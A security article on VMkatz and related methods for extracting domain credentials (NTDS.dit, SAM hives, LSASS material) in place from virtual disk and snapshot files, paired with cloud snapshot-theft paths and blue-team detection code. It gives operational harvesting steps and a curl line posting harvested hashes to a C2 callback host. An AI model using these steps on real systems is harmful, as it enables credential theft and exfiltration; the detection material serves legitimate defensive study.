
Introduction:
In modern red team engagements, the battleground has shifted from network perimeters to the hypervisor and storage layers. Traditional exfiltration of entire virtual machine disk images (VMDKs) is often infeasible due to bandwidth constraints, proxy chains, and the high risk of detection from sustained anomalous traffic. VMkatz addresses this operational gap by enabling in-place credential extraction from VM files—allowing operators to read sensitive artifacts like NTLM hashes and Kerberos tickets directly from the source without moving gigabytes of data.
Learning Objectives:
- Understand the concept of in-place forensic extraction versus traditional data exfiltration.
- Learn to use VMkatz to parse NTLM hashes, DPAPI keys, and NTDS.dit from virtual disk snapshots.
- Identify detection strategies for anomalous storage I/O patterns during an incident response.
You Should Know:
1. The Operational Context of In-Place Extraction
The scenario described by Joas A Santos is a classic red team bottleneck: deep inside a network, connected through a cascade of SOCKS proxies, every kilobyte counts. The discovery of a NAS or virtualization host containing domain controller VMDKs represents a high-value target. However, transferring a 100 GB disk over a 200 KB/s link would take approximately six days—an unacceptable risk. VMkatz (developed by @nikaiw) changes this calculus by operating as a static binary (roughly 2.5 MB) that can be deployed directly on the target host. It reads only the necessary sectors of the VMDK, VMSN (snapshot), or SAV (suspended state) files to locate and decrypt credentials.
Step-by-step guide to using VMkatz:
- Step 1: Deploy the VMkatz binary wherever the VM files are reachable: the virtualization host itself (ESXi, Proxmox) or a host on which the NAS share holding them is mounted. Use `scp` or a C2 agent to transfer the file.
- Step 2: Navigate to the directory containing the VM files. Identify the target files: `.vmdk` (disk), `.vmsn` (snapshot state; the guest memory captured with a snapshot sits in the `.vmsn` or in a companion `.vmem`, depending on the VMware product and version), or `.sav` (saved state).
- Step 3: Execute the binary with the target file path: `./vmkatz -f domain_controller.vmdk`
- Step 4: Parse the output. What comes back depends on the file type given:
  - `NTDS.dit` hashes (from a domain controller's disk image)
  - `LSASS` memory artifacts, including Kerberos tickets (from snapshot or saved-state memory; a `.vmdk` alone holds no LSASS memory)
  - `SAM` and `SYSTEM` registry hives (from the disk image)
  - DPAPI master keys
For Linux analysis boxes, install `qemu-utils` (which provides `qemu-nbd`) and `libguestfs-tools` so the image can be attached and read in place, without converting it to raw first. Attach read-only, and do not assume the Windows volume is the first partition (System Reserved or EFI partitions usually come first):

```bash
# Attach a VMDK read-only via the kernel NBD driver and mount the Windows volume
sudo modprobe nbd max_part=16
sudo qemu-nbd --read-only -c /dev/nbd0 /path/to/disk.vmdk
lsblk /dev/nbd0                       # pick the NTFS volume; run partprobe /dev/nbd0 if no nbd0pN nodes appear
sudo mount -o ro /dev/nbd0p2 /mnt/vm_mount
# copy Windows/System32/config/{SAM,SYSTEM,SECURITY} and Windows/NTDS/ntds.dit from /mnt/vm_mount, then detach
sudo umount /mnt/vm_mount && sudo qemu-nbd -d /dev/nbd0
```
2. Extracting Credentials from Virtual Artifacts
Understanding what VMkatz targets is crucial for both offense and defense. When a domain controller is virtualized, its credential material sits in two places: the disk image (`.vmdk`: `NTDS.dit` and the `SAM`/`SYSTEM`/`SECURITY` hives) and the snapshot or suspend state (`.vmsn`/`.vmss` with the accompanying `.vmem`: guest memory, including LSASS). By parsing these files where they sit, the tool never calls a Windows API inside the guest and never touches the live domain controller over the network, so none of the guest-side telemetry that normally catches LSASS access is ever generated.
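How a tool can pull a few sectors out of a multi-gigabyte image without reading the rest comes down to the VMDK sparse format. The hosted monolithicSparse layout puts a 512-byte header at sector 0, an embedded text descriptor right after it, and a grain directory plus grain tables that map guest sectors to file offsets, so resolving one guest sector costs a handful of small reads whatever the disk size. (ESXi's own `-flat.vmdk` extents are raw; there the descriptor supplies the geometry and the flat file is addressed directly.) The following is an added example written for this article, not VMkatz's or VMware's code: it parses the header, reads the descriptor, and resolves a guest LBA through the grain tables against a small image constructed in memory. The field names and the synthetic image are the example's own; the header layout follows the published SparseExtentHeader.

```python
"""Sparse-VMDK reader: header, embedded descriptor, and grain-directory lookup.

Added example for this article, not code from VMkatz or VMware. Field layout follows the
published SparseExtentHeader (hosted monolithicSparse format); the image is constructed in
memory so the script runs offline.
"""
import io
import struct

SECTOR = 512
VMDK_MAGIC = 0x564D444B  # b"KDMV" read little-endian
# SparseExtentHeader is byte-packed and exactly one sector long.
HEADER = struct.Struct("<IIIQQQQIQQQB4cH433x")
FIELDS = ("magic", "version", "flags", "capacity", "grain_size", "desc_offset", "desc_size",
          "gtes_per_gt", "rgd_offset", "gd_offset", "overhead", "unclean_shutdown",
          "nl1", "nl2", "nl3", "nl4", "compress_algorithm")


def parse_header(img):
    """Read sector 0 and return the header fields (sizes and offsets are in 512-byte sectors)."""
    img.seek(0)
    hdr = dict(zip(FIELDS, HEADER.unpack(img.read(SECTOR))))
    if hdr["magic"] != VMDK_MAGIC:
        raise ValueError("not a hosted sparse VMDK extent (bad KDMV magic)")
    return hdr


def read_descriptor(img, hdr):
    """Return (key/value settings, extent lines) from the embedded text descriptor."""
    img.seek(hdr["desc_offset"] * SECTOR)
    text = img.read(hdr["desc_size"] * SECTOR).split(b"\0", 1)[0].decode("ascii", "replace")
    settings, extents = {}, []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if line.split()[0] in ("RW", "RDONLY", "NOACCESS"):  # e.g. RW 65536 SPARSE "dc01.vmdk"
            extents.append(line)
        elif "=" in line:
            key, value = line.split("=", 1)
            settings[key.strip()] = value.strip().strip('"')
    return settings, extents


def read_sector(img, hdr, lba):
    """Read one guest sector by walking grain directory -> grain table -> grain.

    Four small reads touch the file regardless of disk size; unallocated grains (GTE 0)
    and zero grains (GTE 1) come back as zeros without any further I/O.
    """
    if lba >= hdr["capacity"]:
        raise ValueError("LBA beyond extent capacity")
    grain, offset_in_grain = divmod(lba, hdr["grain_size"])
    gt_index, gte_index = divmod(grain, hdr["gtes_per_gt"])
    img.seek(hdr["gd_offset"] * SECTOR + gt_index * 4)
    (gt_sector,) = struct.unpack("<I", img.read(4))
    if gt_sector == 0:
        return bytes(SECTOR)
    img.seek(gt_sector * SECTOR + gte_index * 4)
    (grain_sector,) = struct.unpack("<I", img.read(4))
    if grain_sector <= 1:
        return bytes(SECTOR)
    img.seek((grain_sector + offset_in_grain) * SECTOR)
    return img.read(SECTOR)


def build_sample_image():
    """Constructed 32 MiB monolithicSparse extent: 64 KiB grains, one grain table, one grain allocated."""
    capacity, grain_size, gtes_per_gt = 65536, 128, 512
    desc_off, desc_size, gd_off, gt_off, overhead = 1, 20, 21, 22, 128
    descriptor = (b'# Disk DescriptorFile\nversion=1\nCID=fffffffe\nparentCID=ffffffff\n'
                  b'createType="monolithicSparse"\n\n# Extent description\n'
                  b'RW 65536 SPARSE "dc01.vmdk"\n\n# The Disk Data Base\n#DDB\n'
                  b'ddb.adapterType = "lsilogic"\nddb.virtualHWVersion = "18"\n')
    header = HEADER.pack(VMDK_MAGIC, 1, 1, capacity, grain_size, desc_off, desc_size, gtes_per_gt,
                         0, gd_off, overhead, 0, b"\n", b" ", b"\r", b"\n", 0)
    img = bytearray((overhead + grain_size) * SECTOR)
    img[0:SECTOR] = header
    img[desc_off * SECTOR:desc_off * SECTOR + len(descriptor)] = descriptor
    struct.pack_into("<I", img, gd_off * SECTOR, gt_off)            # GD[0] -> grain table at sector 22
    struct.pack_into("<I", img, gt_off * SECTOR + 3 * 4, overhead)  # GT[3] -> grain 3 stored at sector 128
    payload = b"constructed guest data in grain 3".ljust(SECTOR, b"\0")
    img[overhead * SECTOR:(overhead + 1) * SECTOR] = payload
    return io.BytesIO(bytes(img))


if __name__ == "__main__":
    image = build_sample_image()
    header = parse_header(image)
    settings, extents = read_descriptor(image, header)
    print(settings["createType"], extents, header["capacity"] * SECTOR // 2**20, "MiB")
    print(read_sector(image, header, 3 * 128).rstrip(b"\0"))  # grain 3, first sector -> payload
    print(read_sector(image, header, 0) == bytes(SECTOR))       # unallocated grain -> zeros
```

Once `read_sector` works, an NTFS parser layered on top can locate `\Windows\NTDS\ntds.dit` through the MFT and fetch only its clusters, which is the whole reason a 2.5 MB binary can finish where a 100 GB copy cannot. Snapshot chains add one more hop: a `-delta.vmdk` or SE-sparse child uses a different header, and unallocated grains must fall through to the parent named by `parentCID`/`parentFileNameHint` rather than reading as zeros.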
Command and Control Integration:
To operationalize this, operators often combine VMkatz with a C2 framework. After extraction, the results (hashes, tickets) can be piped to a staging area for offline cracking or pass-the-hash attacks.
```bash
# Extract and keep only the NTLM lines (the grep pattern follows the tool's output format)
./vmkatz -f DC.vmdk | grep -i "NTLM" > creds.txt
# Exfiltrate only the small hash file over the existing channel
curl -X POST https://c2-server/callback --data-binary @creds.txt
```
3. Advanced Linux Commands for Forensic Parsing
If the target environment is Linux-based (e.g., Proxmox or KVM), operators can utilize standard Linux tools to interact with the virtual disk images before running specialized tools like VMkatz.
List partitions inside a raw/qcow2/vmdk file:
```bash
# Without mounting anything, list the partitions and filesystems inside the image
virt-filesystems -a disk.vmdk --all --long -h
# Download the SYSTEM hive straight out of the guest filesystem, read-only (-i inspects and mounts the OS).
# NTFS paths are matched case-sensitively here: use the on-disk case, or a win:-prefixed path such as
# win:c:\windows\system32\config\system, which guestfish resolves case-insensitively.
guestfish --ro -a disk.vmdk -i download /Windows/System32/config/SYSTEM SYSTEM.hive
```
4. Windows-Based Analysis and Credential Harvesting
While VMkatz operates on the hypervisor/storage level, traditional Windows commands remain relevant for verifying extracted data or for lateral movement once credentials are obtained.
Extract hashes from hives saved off a live host (alternative methodology):
```bat
:: On a compromised Windows host, save the hives with reg.exe (needs an elevated shell)
reg save HKLM\SYSTEM system.hive
reg save HKLM\SAM sam.hive
:: Parse them offline with Impacket's secretsdump.py; LOCAL tells it to read the files instead of a target
python3 secretsdump.py -sam sam.hive -system system.hive LOCAL
```
5. API Security and Hypervisor Vulnerabilities
The ability to read VMDK files often stems from compromised credentials for the hypervisor's management API rather than from a foothold on the host. ESXi exposes the vSphere API, and with vCenter credentials an operator can enumerate a VM's disk files, copy them off the datastore, or attach a disk to another VM, all remotely and without dropping a binary on the host. PowerCLI makes the enumeration a few lines:
PowerCLI commands to locate a VM's disk files:
```powershell
Connect-VIServer -Server vcenter.domain.com
$vm = Get-VM -Name "DomainController"
# Datastore path of every virtual disk, e.g. "[datastore1] DomainController/DomainController.vmdk"
Get-HardDisk -VM $vm | Select-Object Name, CapacityGB, Filename
# Every file backing the VM (.vmdk descriptors and -flat/-delta extents, .vmsn, .vmem, .nvram ...)
$vm.ExtensionData.LayoutEx.File | Where-Object { $_.Name -like "*.vmdk" } | Select-Object Name, Type, Size
```
Note: listing files this way needs the Datastore > Browse datastore privilege; copying them out through the `vmstore:` PSDrive (`Copy-DatastoreItem`) or attaching them to another VM additionally needs Datastore > Low level file operations and Virtual machine > Configuration privileges, so this route is realistic only with an administrative vCenter account. Copying also brings back the bulk-transfer problem from section 1, which is why in-place parsing on the host remains attractive.
6. Cloud Hardening Against Virtual Disk Extraction
In cloud environments (AWS, Azure, GCP) the same principle applies with different storage primitives. An attacker holding an IAM role or subscription permission that can snapshot block storage can snapshot the domain controller's EBS volume or Azure Managed Disk, create a new volume from it, and attach it to an instance they control, where it appears as a plain block device: no VMDK parsing is needed, and the hives and `NTDS.dit` can be copied from the mounted filesystem and fed to `secretsdump.py`. Azure additionally lets a disk or snapshot be exported through a time-limited SAS URL (the `disks/beginGetAccess` operation), which pulls the whole image out of the tenant without any instance at all.
Mitigation:
- Encrypt volumes at rest with a customer-managed KMS key (or Azure Disk Encryption with a customer-managed key) and restrict `kms:Decrypt`/`kms:CreateGrant` in the key policy to the workload's own roles. The default account-managed key does not help here: any principal allowed to snapshot and attach within the account reads the data transparently.
- Restrict and monitor the snapshot path itself: `CreateSnapshot`, `CreateVolume` from a snapshot, `AttachVolume` to an instance outside the workload, and `ModifySnapshotAttribute` granting `createVolumePermission` to another account are all recorded in CloudTrail and should be correlated as a chain rather than alerted on individually, since a snapshot on its own is routine backup activity.
- Treat disk-export operations (Azure `beginGetAccess`, AWS snapshot sharing, and their GCP equivalents) as privileged actions that require approval and generate an alert.
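Because a snapshot of a domain controller's volume is routine backup noise, alerting on `CreateSnapshot` alone drowns the analyst. The chain worth catching is: snapshot of a sensitive volume, a new volume created from it, and that volume attached to an instance the data does not belong to, or the snapshot shared to another account. As an added example written for this article, not taken from AWS or any vendor tooling, the following Python correlates constructed CloudTrail records into exactly that chain. The protected-volume inventory is an assumption standing in for tags or a CMDB, and the records are trimmed to the fields the logic uses.

```python
"""Correlate CloudTrail EC2 events into a snapshot -> new volume -> attach-elsewhere chain.

Added example for this article, written for it rather than taken from any AWS tooling. The
records below are constructed and trimmed to the CloudTrail fields used here (eventName,
userIdentity.arn, requestParameters, responseElements); PROTECTED_VOLUMES is an assumption
standing in for what tags or a CMDB would supply.
"""

# Constructed inventory: the domain controller's volume and the instance it belongs to.
PROTECTED_VOLUMES = {"vol-0a1b2c3d4e5f60001": "i-0dc0a1b2c3d4e5f60"}

BACKUP = "arn:aws:sts::111122223333:assumed-role/BackupRole/nightly"
CI_ROLE = "arn:aws:sts::111122223333:assumed-role/CiDeploy/build"

# Constructed sample: a legitimate nightly snapshot, then a CI role snapshotting the same
# volume, mounting it on an unrelated instance and sharing it to a foreign account.
SAMPLE_EVENTS = [
    {"eventTime": "2024-05-01T01:00:00Z", "eventName": "CreateSnapshot", "userIdentity": {"arn": BACKUP},
     "requestParameters": {"volumeId": "vol-0a1b2c3d4e5f60001"},
     "responseElements": {"snapshotId": "snap-0b1b2c3d4e5f60001", "status": "pending"}},
    {"eventTime": "2024-05-01T03:12:00Z", "eventName": "CreateSnapshot", "userIdentity": {"arn": CI_ROLE},
     "requestParameters": {"volumeId": "vol-0a1b2c3d4e5f60001"},
     "responseElements": {"snapshotId": "snap-0c1b2c3d4e5f60002", "status": "pending"}},
    {"eventTime": "2024-05-01T03:14:00Z", "eventName": "CreateVolume", "userIdentity": {"arn": CI_ROLE},
     "requestParameters": {"snapshotId": "snap-0c1b2c3d4e5f60002", "availabilityZone": "us-east-1a"},
     "responseElements": {"volumeId": "vol-0e1b2c3d4e5f60009"}},
    {"eventTime": "2024-05-01T03:15:00Z", "eventName": "AttachVolume", "userIdentity": {"arn": CI_ROLE},
     "requestParameters": {"volumeId": "vol-0e1b2c3d4e5f60009", "instanceId": "i-0bad0a1b2c3d4e5f6",
                           "device": "/dev/sdf"},
     "responseElements": {"status": "attaching"}},
    {"eventTime": "2024-05-01T03:20:00Z", "eventName": "ModifySnapshotAttribute", "userIdentity": {"arn": CI_ROLE},
     "requestParameters": {"snapshotId": "snap-0c1b2c3d4e5f60002", "attributeType": "CREATE_VOLUME_PERMISSION",
                           "createVolumePermission": {"add": {"items": [{"userId": "999988887777"}]}}},
     "responseElements": {"_return": True}},
]


def account_of(arn):
    """The account ID is the fifth colon-separated component of an ARN."""
    return arn.split(":")[4]


def correlate(events, protected=PROTECTED_VOLUMES):
    """Return findings for snapshots of protected volumes that are shared out or mounted elsewhere."""
    snapshot_source = {}   # snapshotId -> source volumeId
    volume_from_snap = {}  # new volumeId -> snapshotId it was created from
    findings = []
    for ev in sorted(events, key=lambda e: e["eventTime"]):
        name, actor = ev["eventName"], ev["userIdentity"]["arn"]
        req, resp = ev.get("requestParameters") or {}, ev.get("responseElements") or {}
        if name == "CreateSnapshot":
            # Snapshotting a DC volume is normal backup behaviour: remember it, do not alert yet.
            snapshot_source[resp["snapshotId"]] = req["volumeId"]
        elif name == "CreateVolume" and "snapshotId" in req:
            volume_from_snap[resp["volumeId"]] = req["snapshotId"]
        elif name == "AttachVolume":
            source = snapshot_source.get(volume_from_snap.get(req["volumeId"]))
            if source in protected and req["instanceId"] != protected[source]:
                findings.append({"type": "snapshot_attached_elsewhere", "actor": actor, "source_volume": source,
                                 "instance": req["instanceId"], "time": ev["eventTime"]})
        elif name == "ModifySnapshotAttribute":
            source = snapshot_source.get(req.get("snapshotId"))
            added = req.get("createVolumePermission", {}).get("add", {}).get("items", [])
            # Grants to a different account, or to the "all" group (public), leave the tenant.
            foreign = [i.get("userId") or i.get("group") for i in added if i.get("userId") != account_of(actor)]
            if source in protected and foreign:
                findings.append({"type": "snapshot_shared_externally", "actor": actor, "source_volume": source,
                                 "shared_with": foreign, "time": ev["eventTime"]})
    return findings


if __name__ == "__main__":
    for finding in correlate(SAMPLE_EVENTS):
        print(finding)
```

The legitimate `BackupRole` snapshot produces nothing; the `CiDeploy` chain produces two findings. In production the same logic runs over the CloudTrail Lake or Athena table, with the inventory coming from volume tags rather than a constant, and the attach check extended to cover instances outside the expected account and AZ.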
7. Detection and Mitigation Strategies for Blue Teams
The core advantage of tools like VMkatz is the “low and slow” approach—avoiding the massive data transfer that triggers network detection. Blue teams must shift focus to the storage layer.
Detection via Windows Event Logs (only if LSASS or `NTDS.dit` is touched inside the running guest; offline parsing of the VM files generates no guest events at all):
- Event ID 4656 ("A handle to an object was requested"): a handle to the LSASS process with read access. This needs kernel object auditing configured; in practice Sysmon Event ID 10 (ProcessAccess) on `lsass.exe` is the more common source.
- Event ID 4663 ("An attempt was made to access an object"): access to `NTDS.dit` by a process not associated with backup operations. This needs a SACL on the file and Audit File System enabled.
Linux-based detection on the hypervisor:
ESXi is not a Linux host and has no `auditd`; there, rely on `/var/log/shell.log` (ESXi Shell command history), the hostd and vpxa logs, and vCenter's datastore browse and download events. On a KVM or Proxmox host, audit every open-for-read under the image directory (`/var/lib/libvirt/images`, `/var/lib/vz/images`, or the NFS/NAS mount point that holds the VMs) with a recursive `dir=` rule:
```bash
# Every open-for-read under the VM image directory, recursively, tagged for the SIEM.
# perm=r matches the open/openat syscall, not each read(), so a running VM contributes
# one record per disk at start-up and the rule stays cheap.
auditctl -a always,exit -F dir=/var/lib/libvirt/images -F perm=r -k vmdisk_read
```
ELK/Splunk Queries for Anomalous I/O:
Splunk SPL example over the `vmdisk_read` key written by the `auditctl` rule above. The sourcetype is `linux_audit` (`linux_secure` is only the authentication log), and because auditd splits the program (SYSCALL record) and the file (PATH record) into separate events, they have to be joined on the audit serial before an exe/file pairing can be judged:
```spl
index=os sourcetype=linux_audit (type=SYSCALL key=vmdisk_read) OR (type=PATH name IN ("*.vmdk","*.vmsn","*.vmss","*.vmem","*.qcow2"))
| rex "msg=audit\(\d+\.\d+:(?<serial>\d+)\)"
| stats min(_time) AS _time values(exe) AS exe values(auid) AS auid values(name) AS file BY host, serial
| where isnotnull(exe) AND isnotnull(file)
| search NOT exe IN ("/usr/bin/qemu-system-x86_64", "/usr/sbin/libvirtd")
| stats count min(_time) AS first_seen values(file) AS files BY host, exe, auid
| where count < 10
```
The allowlist is the hypervisor's own processes (the ESXi equivalents would be `vpxa` and `hostd`, but they never reach auditd); the final `count < 10` keeps the rare, low-volume readers that a surgical tool produces, and `auid` is the login UID, which survives `sudo` and so names the operator rather than `root`.
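Before the SPL goes into a SIEM, or on a single host where there is none, the same join of SYSCALL and PATH records can be done directly over `audit.log`. The following added example (written for this article, not part of auditd, VMkatz or Splunk) parses a constructed log excerpt, joins the records on their serial, keeps events tagged `vmdisk_read` whose path is a VM disk or memory file, and reports every opener that is not an expected hypervisor process. `/tmp/extract` is a constructed stand-in for a dropped binary; the allowlist assumes a KVM/libvirt host.

```python
"""Triage auditd records for VM disk/memory files opened by unexpected programs.

Added example for this article (not part of VMkatz, auditd or any vendor tooling). auditd
writes a SYSCALL record (who, which binary) and one or more PATH records (which file) per
event, tied together by the serial in msg=audit(<time>:<serial>); they must be joined before
the exe/file pairing can be judged. The log below is constructed, not a real capture.
"""
import re
from collections import defaultdict

# Constructed /var/log/audit/audit.log excerpt: the hypervisor opening a disk at VM start,
# then a dropped binary, qemu-nbd and a harmless cat run by login uid 1000 through sudo.
SAMPLE_AUDIT_LOG = """\
type=SYSCALL msg=audit(1700000000.101:4501): arch=c000003e syscall=257 success=yes exit=12 items=1 ppid=1 pid=1422 auid=4294967295 uid=0 gid=0 euid=0 comm="qemu-system-x86" exe="/usr/bin/qemu-system-x86_64" key="vmdisk_read"
type=PATH msg=audit(1700000000.101:4501): item=0 name="/var/lib/libvirt/images/dc01.vmdk" inode=131 dev=fd:00 mode=0100600 ouid=107 ogid=107 nametype=NORMAL
type=SYSCALL msg=audit(1700000320.412:4602): arch=c000003e syscall=257 success=yes exit=3 items=1 ppid=3380 pid=3391 auid=1000 uid=0 gid=0 euid=0 comm="extract" exe="/tmp/extract" key="vmdisk_read"
type=PATH msg=audit(1700000320.412:4602): item=0 name="/var/lib/libvirt/images/dc01.vmdk" inode=131 dev=fd:00 mode=0100600 ouid=107 ogid=107 nametype=NORMAL
type=SYSCALL msg=audit(1700000331.009:4603): arch=c000003e syscall=257 success=yes exit=3 items=1 ppid=3380 pid=3402 auid=1000 uid=0 gid=0 euid=0 comm="qemu-nbd" exe="/usr/bin/qemu-nbd" key="vmdisk_read"
type=PATH msg=audit(1700000331.009:4603): item=0 name="/var/lib/libvirt/images/dc01-000001.vmdk" inode=133 dev=fd:00 mode=0100600 ouid=107 ogid=107 nametype=NORMAL
type=SYSCALL msg=audit(1700000340.777:4610): arch=c000003e syscall=257 success=yes exit=4 items=1 ppid=3380 pid=3410 auid=1000 uid=0 gid=0 euid=0 comm="cat" exe="/usr/bin/cat" key="vmdisk_read"
type=PATH msg=audit(1700000340.777:4610): item=0 name="/var/lib/libvirt/images/notes.txt" inode=140 dev=fd:00 mode=0100644 ouid=0 ogid=0 nametype=NORMAL
"""

FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')
SERIAL_RE = re.compile(r'msg=audit\((\d+\.\d+):(\d+)\)')
VM_FILE_SUFFIXES = (".vmdk", ".vmsn", ".vmss", ".vmem", ".qcow2", ".raw")
# Programs that legitimately open guest disks on a KVM/libvirt host; anything else is a finding.
EXPECTED_READERS = frozenset({"/usr/bin/qemu-system-x86_64", "/usr/sbin/libvirtd"})


def parse_events(log_text):
    """Join SYSCALL and PATH records on their audit serial; returns {serial: event dict}."""
    events = defaultdict(lambda: {"paths": []})
    for line in log_text.splitlines():
        m = SERIAL_RE.search(line)
        if not m:
            continue
        fields = {k: v.strip('"') for k, v in FIELD_RE.findall(line)}
        ev = events[m.group(2)]
        ev["time"] = float(m.group(1))
        if fields.get("type") == "SYSCALL":
            # comm is truncated to 15 characters by the kernel; exe is the full path and is what to match on
            ev.update(exe=fields.get("exe"), comm=fields.get("comm"),
                      uid=fields.get("uid"), auid=fields.get("auid"), key=fields.get("key"))
        elif fields.get("type") == "PATH":
            ev["paths"].append(fields.get("name", ""))
    return events


def find_unexpected_readers(log_text, allowlist=EXPECTED_READERS):
    """Events tagged vmdisk_read whose PATH is a VM file and whose exe is not an expected reader."""
    findings = []
    for serial, ev in sorted(parse_events(log_text).items(), key=lambda kv: kv[1]["time"]):
        if ev.get("key") != "vmdisk_read":
            continue
        vm_files = [p for p in ev["paths"] if p.lower().endswith(VM_FILE_SUFFIXES)]
        if vm_files and ev.get("exe") not in allowlist:
            # auid is the login uid and survives sudo, so it names the human rather than "root"
            findings.append({"serial": serial, "exe": ev["exe"], "comm": ev["comm"],
                             "auid": ev["auid"], "file": vm_files[0]})
    return findings


if __name__ == "__main__":
    for f in find_unexpected_readers(SAMPLE_AUDIT_LOG):
        print(f"serial={f['serial']} auid={f['auid']} {f['exe']} opened {f['file']}")
```

On the sample this yields two findings, `/tmp/extract` and `/usr/bin/qemu-nbd`, both attributable to login UID 1000 even though the processes ran as root; the hypervisor's own open and the `cat` of a text file are dropped. Note that the same logic applies unchanged to an NFS server exporting the VM directory, which is often the quieter place to run it.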
What Undercode Say:
- Exfiltration is Dead; In-Place Extraction is the New Norm: Tools like VMkatz highlight a paradigm shift where attackers no longer need to move large files. The ability to surgically extract credentials from static files means defenders can no longer rely solely on network egress monitoring.
- Defense Must Extend to the Hypervisor and Storage I/O: Traditional endpoint detection (EDR) is blind to reads occurring on a NAS or virtualization host if the agent isn't installed there. Blue teams must implement storage-level auditing, looking for processes like `qemu-nbd`, `guestfish`, or custom binaries interacting with virtual disk files.
Key Takeaway 1: Offensive security now focuses on minimizing digital footprints by manipulating artifacts where they reside, using tools that parse structures like VMDKs without full image mounting.
Key Takeaway 2: The most effective mitigation is layered: encrypt virtual disks at rest with keys the storage operators themselves cannot use, strictly limit who can reach hypervisor storage paths, and audit opens of `.vmdk`, `.vmsn`, `.vmss` and `.vmem` files. File integrity monitoring (FIM) on those paths catches tampering, not reads; detecting unauthorized reads needs access auditing of the kind shown in section 7.
Prediction:
As virtualization and cloud adoption continue to dominate enterprise infrastructure, the battleground will increasingly be the storage layer. We will see a rise in “storage-only” attacks where initial access is gained via misconfigured S3 buckets or NFS shares, followed by in-place extraction tools that operate entirely outside the guest OS. Defenders will be forced to adopt “honeypot” virtual disks and advanced I/O analytics to detect these surgical strikes before the keys to the kingdom are silently read.
Reported By: Joas Antonio – Hackers Feeds


